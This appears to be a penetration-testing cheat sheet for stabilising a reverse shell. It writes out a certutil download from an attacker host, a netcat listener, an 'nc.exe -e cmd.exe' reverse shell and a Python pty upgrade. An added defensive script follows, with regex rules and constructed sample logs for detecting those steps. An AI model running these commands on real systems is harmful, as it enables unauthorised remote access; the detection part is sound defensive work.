Once we have initial access through a reverse shell, we can stabilize it by downloading netcat (nc) to the victim machine (if it is not already present) and running a second reverse shell from it:
Download nc from the attacker machine:
certutil.exe -f -urlcache http://<ip.of.attacker.machine>:<port>/nc.exe nc.exe
Then start a listener on the attacker machine:
nc -lnvp <port>
Run a reverse shell (cmd.exe treats single quotes literally, so the program name is passed unquoted):
nc.exe <ip.of.attacker.machine> <port> -e cmd.exe
Make sure you are running in bash. To temporarily switch to a bash shell, run the following command in your terminal:
exec bash --login
You can confirm that you are using bash by running:
ps -p $$
In the bash terminal, run the listener, and once the shell connects, run the following command inside it to upgrade it to a proper TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
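From the defender's side, each step above leaves a distinctive process command line. The following is an added example (not part of the original cheat sheet) that flags those three patterns in constructed, Sysmon-style process-creation log lines; the rule names, log format and sample events are assumptions for illustration.

```python
"""Detect the shell-stabilisation steps from the cheat sheet in process logs.

Added example with constructed sample data: flags certutil used as a
downloader, a netcat binary launched with -e, and a Python pty spawn.
"""
import re

# Each rule: (name, regex applied to the lower-cased command line)
RULES = [
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://")),
    ("netcat_exec_shell",
     re.compile(r"\bnc(at)?(\.exe)?\b.*\s-e\s+\S*(cmd|powershell|sh|bash)")),
    ("pty_shell_upgrade",
     re.compile(r"python\d?(\.exe)?\b.*pty\.spawn\(")),
]

def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the command line matches."""
    text = cmdline.lower()
    return [name for name, rx in RULES if rx.search(text)]

def scan(log_lines: list[str]) -> list[tuple[str, list[str]]]:
    """Scan 'CommandLine: ...' style lines; return (cmdline, matched rules)."""
    hits = []
    for line in log_lines:
        m = re.search(r"commandline:\s*(.*)$", line, re.IGNORECASE)
        if not m:
            continue
        matched = classify(m.group(1))
        if matched:
            hits.append((m.group(1), matched))
    return hits

# Constructed sample events (hypothetical one-line Sysmon-like format, TEST-NET address).
SAMPLE_LOG = [
    "EventID: 1 Image: C:\\Windows\\System32\\certutil.exe CommandLine: certutil.exe -f -urlcache http://203.0.113.5:8000/nc.exe nc.exe",
    "EventID: 1 Image: C:\\Windows\\System32\\certutil.exe CommandLine: certutil.exe -verifystore My",
    "EventID: 1 Image: C:\\Users\\Public\\nc.exe CommandLine: nc.exe 203.0.113.5 4444 -e cmd.exe",
    "EventID: 1 Image: /usr/bin/python3 CommandLine: python3 -c import pty; pty.spawn(\"/bin/bash\")",
    "EventID: 1 Image: C:\\Windows\\System32\\notepad.exe CommandLine: notepad.exe report.txt",
]

if __name__ == "__main__":
    for cmd, rules in scan(SAMPLE_LOG):
        print(f"{', '.join(rules)}: {cmd}")
```

The benign certutil and notepad events are included to show the rules do not fire on ordinary certificate-store or editor usage.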